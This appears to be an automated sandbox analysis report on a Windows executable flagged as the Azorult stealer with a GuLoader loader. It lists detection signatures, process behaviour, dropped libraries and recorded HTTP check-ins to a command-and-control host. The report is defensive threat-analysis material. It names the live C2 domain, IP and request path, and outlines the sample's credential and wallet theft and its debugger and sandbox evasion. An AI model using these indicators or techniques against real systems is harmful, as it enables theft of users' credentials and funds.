Loading ...

Play interactive tourEdit tour

Analysis Report cjwe.exe

Overview

General Information

Sample Name:cjwe.exe
Analysis ID:289128
MD5:88bb74f36b0640b2c521ce68d0100e14
SHA1:0d8a45e3ef1bdd54ac0456970180ff06b641583d
SHA256:0a9055100b10ba145a65334aa2b316bc30722cd75539c6dcca168da6263040a6
Tags:exe

Most interesting Screenshot:

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cjwe.exe (PID: 6656 cmdline: 'C:\Users\user\Desktop\cjwe.exe' MD5: 88BB74F36B0640B2C521CE68D0100E14)
    • cjwe.exe (PID: 6896 cmdline: 'C:\Users\user\Desktop\cjwe.exe' MD5: 88BB74F36B0640B2C521CE68D0100E14)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.295447945.000000001F41C000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    Process Memory Space: cjwe.exe PID: 6656JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: cjwe.exe PID: 6656JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: cjwe.exe PID: 6896JoeSecurity_Azorult_1Yara detected AzorultJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: officestore.co.idVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: cjwe.exeVirustotal: Detection: 29%Perma Link
          Source: cjwe.exeReversingLabs: Detection: 18%

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.4:49722 -> 103.247.10.55:80
          Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.4:49722
          Source: Joe Sandbox ViewIP Address: 103.247.10.55 103.247.10.55
          Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
          Source: global trafficHTTP traffic detected: POST /cjj/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 101Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 96 47 14 8b 30 61 8b 30 61 8b 30 61 8b 30 64 8b 31 11 ec 42 11 8b 30 6c ea 41 70 9d 34 14 Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410mGp;p5p4p;1&fG0a0a0a0d1B0lAp4
          Source: global trafficHTTP traffic detected: POST /cjj/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 124523Cache-Control: no-cache
          Source: unknownDNS traffic detected: queries for: onedrive.live.com
          Source: unknownHTTP traffic detected: POST /cjj/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 101Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 96 47 14 8b 30 61 8b 30 61 8b 30 61 8b 30 64 8b 31 11 ec 42 11 8b 30 6c ea 41 70 9d 34 14 Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410mGp;p5p4p;1&fG0a0a0a0d1B0lAp4
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ocsp.thawte.com0
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://www.mozilla.com0
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0

          System Summary:

          barindex
          Potential malicious icon foundShow sources
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230E22 NtSetInformationThread,TerminateProcess,0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233CA5 NtResumeThread,0_2_02233CA5
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02231691 NtWriteVirtualMemory,LoadLibraryA,0_2_02231691
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230315 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_02230315
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233947 NtProtectVirtualMemory,0_2_02233947
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_022318AB NtWriteVirtualMemory,0_2_022318AB
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233CDF NtResumeThread,0_2_02233CDF
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02231725 NtWriteVirtualMemory,0_2_02231725
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02231F34 NtWriteVirtualMemory,0_2_02231F34
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233907 NtProtectVirtualMemory,0_2_02233907
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233D1F NtResumeThread,0_2_02233D1F
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233D6E NtResumeThread,0_2_02233D6E
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_0223037F NtSetInformationThread,TerminateProcess,0_2_0223037F
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230343 NtSetInformationThread,TerminateProcess,0_2_02230343
          Source: cjwe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: api-ms-win-core-debug-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-errorhandling-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-datetime-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-console-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
          Source: cjwe.exe, 00000000.00000002.228271974.00000000021D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs cjwe.exe
          Source: cjwe.exe, 00000000.00000000.211238958.0000000000409000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesvigersnnernena.exe vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.285988114.000000001E3E8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.281682337.000000001E064000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.278970900.000000001F4D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.281497361.000000001F4A4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs cjwe.exe
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs cjwe.exe
          Source: cjwe.exe, 00000003.00000000.226973943.0000000000409000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesvigersnnernena.exe vs cjwe.exe
          Source: cjwe.exeBinary or memory string: OriginalFilenamesvigersnnernena.exe vs cjwe.exe
          Source: C:\Users\user\Desktop\cjwe.exeSection loaded: crtdll.dllJump to behavior
          Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@3/48@3/1
          Source: C:\Users\user\Desktop\cjwe.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-8AD8678F-B8DA4441-BAD9DB7A
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\Jump to behavior
          Source: cjwe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cjwe.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s;
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
          Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
          Source: cjwe.exeVirustotal: Detection: 29%
          Source: cjwe.exeReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe'
          Source: C:\Users\user\Desktop\cjwe.exeProcess created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe' Jump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, mozglue.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr
          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.3.dr
          Source: Binary string: ucrtbase.pdb source: cjwe.exe, 00000003.00000003.278970900.000000001F4D0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: cjwe.exe, 00000003.00000003.281682337.000000001E064000.00000004.00000001.sdmp, freebl3.dll.3.dr
          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.3.dr
          Source: Binary string: vcruntime140.i386.pdbGCTL source: cjwe.exe, 00000003.00000003.285988114.000000001E3E8000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, mozglue.dll.3.dr
          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: cjwe.exe, 00000003.00000003.281682337.000000001E064000.00000004.00000001.sdmp, freebl3.dll.3.dr
          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296348263.000000001E7E0000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr
          Source: Binary string: msvcp140.i386.pdb source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, msvcp140.dll.3.dr
          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.3.dr
          Source: Binary string: ucrtbase.pdbUGP source: cjwe.exe, 00000003.00000003.278970900.000000001F4D0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: cjwe.exe, 00000003.00000003.281497361.000000001F4A4000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.3.dr
          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.3.dr
          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.3.dr
          Source: Binary string: vcruntime140.i386.pdb source: cjwe.exe, 00000003.00000003.285988114.000000001E3E8000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.3.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: cjwe.exe, 00000003.00000003.281497361.000000001F4A4000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
          Source: Binary string: msvcp140.i386.pdbGCTL source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, msvcp140.dll.3.dr
